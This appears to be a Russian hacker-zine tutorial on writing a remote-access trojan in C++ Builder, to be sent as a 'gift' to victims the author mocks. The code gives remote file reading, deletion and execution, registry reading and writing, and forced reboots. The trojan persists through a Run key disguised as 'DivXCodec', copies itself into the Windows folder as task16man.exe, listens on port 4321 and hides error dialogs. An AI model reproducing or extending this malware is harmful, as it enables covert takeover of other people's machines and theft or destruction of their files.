Сегодня мы будем учиться писать троянчик. Небольшой,
но СВОЙ! Почему? Конечно-конечно, троянов в сети навалом, но рано или
поздно они =вдруг= начинают определяться антивирусами, приходиться
ждать апдейта етц... Ожидание - самый скучный повод. Не знаю как вы, но
я ждать не люблю, да и использовать чужие трояны это совсем не
по-}{аЦкERR'ски. Короче, пишем свой троян и точка.
После точки, как учили в школе, пишем с большой буквы... Так вот, о чем
я? Писать я буду, как обычно, на своем любимом Builder C++. Если у вас
руки растут не оттуда, откуда у меня ноги, то без проблем все
переделаете под Дельфи, если припрет конечно...
Естественно, наш троян будет состоять из 2х частей =) Серверной
(отправляемой как подарок ламерюге) и клиентской (оставим себе на
память). Надо сказать, что я давно не юзал никакие трояны, так что не
знаю что там сейчас они умеют делать, может уже и коврик под мышкой
научились двигать или корпус компа открывать. Мы же пишем "троянчик",
поэтому делать он будет только следующее:
1) читать, удалять, запускать файлы на удаленном компьютере
2) работать с реестром на удаленном компьютере
3) ну и традиционный набор разных бесполезных функций, типа открытие CD-ROM'a, смена клавишей мышки etc.
Перекурили и поехали!
Использовать будем стандартные компоненты TClientSocket и TServerSocket.
Начнем с клиента. Набрасываем простенький интерфейс и приступаем к
реализации. Управлять удаленным компьютером будем с помощью специальных
команд. Для примера пускай структура их будет такая:
Nпараметры. N - цифра. Каждому действию присвоен свой код. Т.е.
например 1 - перезагрузка, 2 - чтение файла и т.д. Главное чтоб было
однозначное соответствие между тем что хотим сделать (команда
передаваемая клиентом) и тем что выполняет программа (обработка команды
на сервере). С этим разобрались. Теперь параметры. Бывает мало передать
только номер команды. Конечно, чтобы перезагрузить компьютер никаких
параметров не надо (хотя можно и здесь передать параметры в функцию
перезагрузки), но как например реализовать удаление файла не передавая
параметра? Мы передаем команду на удаление файла, но какого?! Для этого
будем использовать параметры. В качестве параметра в данном случае
будет передаваться имя файла. Бывает, что мало передать один параметр.
Например надо прочитать n-строчек из file.txt. Здесь необходимо
передать 2 параметра. В нашем примере параметры отделяются друг от
друга комбинацией "rn" - перевод каретки. Объясняется данная структура
тем, что в сервере мы сначала помещаем полученную команду в TStringList
и потом можем спокойно обращаться к любой строчке этого TStringList'а
через свойство Strings[i], где i-номер строчки, а соответственно и
номер параметра. В общем, это вещи достаточно очевидные.
Вот так, вроде бы только начав писать клиентскую часть мы ее уже почти
и закончили! Ведь на самом деле ничего кроме отсылки команд и приема
ответов от сервера она делать и не должна. Для приема ответов просто
создадим поле TMemo и добавим обработчик события OnRead нашего
компонента TClientSocket:
Сервер будет чуть пообъемнее. Вначале определимся с задачами:
1) получение команд
2) их обработка и выполнение соответствующих действий
3) отсылка ответа клиенту (должны же мы знать что происходит на сервере)
Реализуем...
Во-первых, никакого визуального оформления естественно не будет =)
Поэтому на форму поместим только 1 компонент: TServerSocket.
Инициализацию его проведем в функции FormCreate(). Хотя можно было бы
просто прописать 2 параметра в Object Inspector'е. Но раз уж сделали,
так сделали =)
Итак, указали порт, активизировали сокет. Теперь обрабатываем событие
ClientRead, т.е. получение данных сокетом. Комментирую на примере:
void __fastcall TForm1::ServScktClientRead(TObject *Sender,
TCustomWinSocket *Socket)
{
RecCommand(Socket->ReceiveText()); // пишем для наглядности функцию обработки поступившей
// информации, которую передаем как параметр этой функции
}
//---------------------------------------------------------------------------
// собственно сама функция: Rec - сокращение от Recognize. Можно по-другому назвать =)
void TForm1::RecCommand (String received)
{
int cn;
TTrojanUtilites Utilz; // создаем объект наших утилит
Utilz.Sock=ServSckt; // необходимо для отсылки ответа клиенту, так как сокет у нас
// находится на форме, а TTrojanUtilites не имеет никакого отношения
// к форме. Просто передаем указатель на TServerSocket
String temp;
temp=received;
temp.Delete(2,temp.Length()); // получаем первый символ сообщения - номер команды
cn = StrToInt(temp); // преобразуем в число
received.Delete(1,1); // удаляем код команды - остаются одни параметры
switch (cn) { // в соответсвии с полученой командой
// запускаем соотвествующую утилиту
case 1 : Utilz.RestartMachine(); break; // перезагрузка
case 2 : Utilz.WriteRegistry(received); break; // запись в реестр
case 3 : Utilz.ReadRegistry(received); break; // чтение реестра
case 4 : Utilz.SendFile(received); break; // чтение файла
case 5 : Utilz.DeleteFile(received); break; // удаление файла
case 6 : Utilz.ExecuteFile(received); break; // запуск файла
case 7 : Utilz.OpenCloseCD; break; // открытие/закрытие CD-ROM
case 8 : Utilz.HideMouse(); break; // прячем курсор мыши
case 9 : Utilz.SwapMouseButtons(); break; // переключаем кнопки мыши
default:
SendMsgToClient("Неправильная команда!") ; // получена недопустимая команда
// информируем клиента об этом
}
}
Теперь немного подробнее. Мы пишем специальный класс TTrojanUtilites, в
котором реализуем все необходимые функции. В RecognizeCommand (String
Directive) мы только отделяем команду от параметров и запускаем
необходимые методы TTrojanUtilites, передавая по необходимости в них
параметры.
Реализация TTrojanUtilites есть то, чем мы сейчас займемся. Класс оформим в отдельном модуле, не забудьте подключить его.
Поехали... Во-первых, подключаем #include - необходимо для реализации работы с CD-ROM'ом. Далее пишем все необходимые методы.
void TTrojanUtilites::RestartMachine()
{
if (ExitWindowsEx(EWX_FORCE,0) || ExitWindowsEx(EWX_REBOOT,0));
Sock->Socket->Connections[0]->SendText("Перезагрузка успешно выполнена.");
}
Вот тут я не отвечаю за все ОСи, перезагрузка-то будет, но хотелось бы
сделать ее как после нажатия кнопки RESET, а так будет послано
сообщение WM_...ENDSESSION etc. Короче, пробуйте сами. Могу только
подкинуть основные направления поиска: смотри функции ExitWindows(),
ExitWindowsEx(), InitiateSystemShutdown() и AbortSystemShutdown(). Для
особо продвинутых могу предложить вариант написать надежный ребут под
определенную ось и чипсет =) Например, мой прошлый комп стабильно
резетился (только в Win9x, в NT не работало) следующей вставочкой:
mov dx,0cf9h
mov al,2
out dx,al
mov al,6
out dx,al
Откуда цифры? Читайте доки по чипсету =) Одним словом, универсального
метода перезагрузить комп без WM_...ENDSESSION я не знаю. Если вы
знаете - напишите пару строк, не в падлу =)
void TTrojanUtilites::SendFile(String F)
{
TStringList* TTSL=new (TStringList);
TStringList* TTSL2=new (TStringList);
int n, i;
TTSL->Text = F;
if (!FileExists(TTSL->Strings[0]))
{
Sock->Socket->Connections[0]->SendText("Файл не существует.");
return;
}
TTSL2->LoadFromFile(TTSL->Strings[0]); // загружаем файл в TStringList
n = TTSL2->Count; // получаем число строк в файле
if (n > StrToInt(TTSL->Strings[1])) // если надо прочитать не весь файл
n = StrToInt(TTSL->Strings[1]); // считываем только необходимое число строк
for (i=0;iSocket->Connections[0]->SendText(TTSL2->Strings[i]); // передаем строки клиенту
}
Вроде тут и объяснять нечего.
void TTrojanUtilites::ReadRegistry(ShortString k)
{
TRegistry* reg=new TRegistry;
String res, ts;
TStringList* TTSL=new TStringList;
HKEY k1;
// параметры передаются в следующем порядке:
//// 0 - root key
//// 1 - key name
//// 2 - value name
//// 3 - value
//// 4 - type of value
TTSL->Text = k;
ts = TTSL->Strings[0]; // выбираем RootKey
if (ts == "HKEY_CLASSES_ROOT") k1 = HKEY_CLASSES_ROOT;
if (ts == "HKEY_CURRENT_USER") k1 = HKEY_CURRENT_USER;
if (ts == "HKEY_LOCAL_MACHINE") k1 = HKEY_LOCAL_MACHINE;
if (ts == "HKEY_USERS") k1 = HKEY_USERS;
if (ts == "HKEY_CURRENT_CONFIG") k1 = HKEY_CURRENT_CONFIG;
reg->RootKey = k1;
reg->OpenKey(TTSL->Strings[1], true); // открываем раздел
ts = TTSL->Strings[3]; // читаем значение параметра опредеоенного типа
if (ts == "Bool") // двоичный (REG_BINARY)
if (reg->ReadBool(TTSL->Strings[2]))
res = "true";
else res = "false";
if (ts == "Integer") // числовой (REG_DWORD)
res = IntToStr(reg->ReadInteger(TTSL->Strings[2]));
if (ts == "String") // строковый (REG_SZ)
res = reg->ReadString(TTSL->Strings[2]);
Sock->Socket->Connections[0]->SendText("Чтение реестра. Значение параметра: "+res);
// передаем клиенту значение параметра
}
Запись в реестр аналогична, только используется метод
WriteBool(TTSL->Strings[2], false); для записи булевского значения,
WriteInteger(TTSL->Strings[2], StrToInt(TTSL->Strings[4])); - для
числового, WriteString(TTSL->Strings[2], TTSL->Strings[4]); - для
строкового.
Для запуска файлов на удаленном компьютере используем следующую функцию:
Файл запускается в той программе, с которой ассоциирован запуск данного
типа файлов, т.е. вы можете запускать не толкьо exe, com, bat, но и
любые другие файлы. Html-файл откроется в Explorer'e, Opere, Netscape
или еще в чем-то... Хрен знает чем там ламерюга пользуется... Можете
запустить ему мп3-шку Децла послушать или Бритни какой-нить, пусть
проблюется =)
Можно сделать переключение кнопок обратно (передайте в SwapMouseButton
параметр false), но я бы посоветовал поставить таймер и каждую секунду
переключать кнопки туда-сюда, веселее будет =) В падлу сейчас уже
добавлять, но вкратце это будет так: добавляем TTimer на форму,
устанавливаем необходимый интервал, и в обработчике события OnTimer
прописываем вызов функции SwapMouseButton с параметром, противоположным
прошлому вызову. Млин, все-таки все расписал =)
Теперь довольно важная функция:
void TTrojanUtilites::DeleteFile(String f)
{
if (!FileExists(f))
{
Sock->Socket->Connections[0]->SendText("Файл не существует.");
return;
}
TRegistry* Reg=new TRegistry;
Reg->RootKey = HKEY_LOCAL_MACHINE;
Reg->OpenKey("SoftwareMicrosoftWindowsCurrentVersionRunOnce", true);
Reg->WriteString("Filez for delete","command.com /c del "+f);
Reg->CloseKey();
Sock->Socket->Connections[0]->SendText("Файл "+f+" будет удален после перезагрузки.");
}
Данная функция НЕ удаляет файл сразу!!! Это сделано специально, так как
файлы могут использоваться системой и их удаление возможно только после
перезагрузки, данная функция помечает файл к удалению, а удалиться он
только после перезагрузки, которую вы легко можете вызвать. Да, еще
маленькое примечание: данная функция удаляет только 1 файл, если вы
пометите второй файл к удалению - то будет удален только он. А первый
останется нетронутым... Немного измените функцию - и можно будет
удалять файлы пачками =) Могу еще добавить немного инфы на случай, если
надо будет удалить целый каталог и вы точно знаете что в нем нет
открытых файлов. Используйте стандартную API функцию SHFileOperation,
установив тип операции wFunc в FO_DELETE. Пример:
Только внимательно все проверьте! Будет обломно если ламерюга "вдруг"
увидит надпись "Папка голые тетки не может быть удалена, так как юзер
активно смотрит сразу 10 порно-фильмов из нее!". А вообще, если опять
удалиться в теорию, то наш главный объект Application имеет несколько
полезных событий, наиболее интересное для нас OnException происходит
тогда, когда в приложении возникает необработанная исключительная
ситуация (деление на ноль, удаление несуществующего файла etc). По
умолчанию, обработчик этого события вызывает метод ShowException для
отображения окна сообщения с пояснением причины ошибки (оно нам надо?!
конечно, НЕТ!). Но, вы можете изменить реакцию на событие onException,
переписав его обработчик. Тут ничего трудного нет, просто я не ставил
перед собой задачу написать офигенный троян, только подтолкнуть вас к
этому =) Кто захочет - допишет все необходимое сам, если что - я
подскажу =) Ну вот, вроде бы все функции реализовали. Теперь немного о
том, что мы не сделали =) Мы не сделали: загрузку/закачку файла. Это
все можно сделать подправив SendFile(). Стандартных функций для
пересылки файлов через TClient(Server)Socket я не нашел, но впрочем,
это не проблема - просто передавайте файлы фрагментами.
Теперь нам осталось только разобраться с автозагрузкой трояна. Сделаем следующее:
1) при запуске файл переписывается в папку, в которой установлены винды.
2) прописываем запуск нашего файла в реестре.
String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("SoftwareMicrosoftWindowsCurrentVersionRun", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) //если нашу программу стерли из
// автозагрузки (DivXCodec - можете поменять по желанию на любое другое название раздела)
pReg->WriteString("DivXCodec",WinDir+"task16man.exe"); //добавляем ее по новой
if (Application->ExeName!=WinDir+"task16man.exe") //если файл запустили 1ый раз
{
if (!FileExists(WinDir+"task16man.exe"))
{
String dest=WinDir+"task16man.exe";
BOOL res=MoveFile(Application->ExeName.c_str(), dest.c_str());
// переписываем файл к виндам
ServSckt->Active = false;
ShellExecute(NULL,NULL,dest.c_str(),NULL,NULL,NULL); //запускаем его
Application->Terminate(); // это приложение закрываем
}
else
Application->Terminate();
// я тут не разбирал вариантов типа прога записалась в винды, но ее еще раз
// запустили и им подобных, додумайте сами =)
}
else
{
ServSckt->Port = 4321;
ServSckt->Active = true;
String data;
TRegistry *pReg = new TRegistry;
pReg->RootKey=HKEY_LOCAL_MACHINE;
pReg->OpenKey("SoftwareMicrosoftWindowsCurrentVersionRun", true);
data=pReg->ReadString("DivXCodec");
if (data != Application->ExeName) // не дай бог стерли!
pReg->WriteString("DivXCodec",Application->ExeName); // пишем назад
}
}
В принципе, это все. Троян готов! Конечно, он тяжеловат,
малофункционален etc, НО все это можно исправить, творите =) Если
сделаете что-нибудь интересное - скидывайте, с радостью опубликуем это
для всех. А вообще, я хочу сейчас все это переделать под API Socket'ы,
без всяких компонентов, тогда и файл exe гораздо меньше станет. Если у
кого-нибудь есть интерес к этому делу - напишите пару строк в мыльницу.
Товарищи ламеры! Внимательно следите теперь за соединениями по порту
4321 =) Некоторые ведь ничего не перекомпиливают и не меняют =)
На этом у меня все. Критика, предложения и 100грамм принимаются, мат и наезды отправляются в /dev/null =) МаЗу с днем рождения!
Клиент [программа и исходный код]
Сервер [программа и исходный код] Lexxxa (Mazafaka.RU)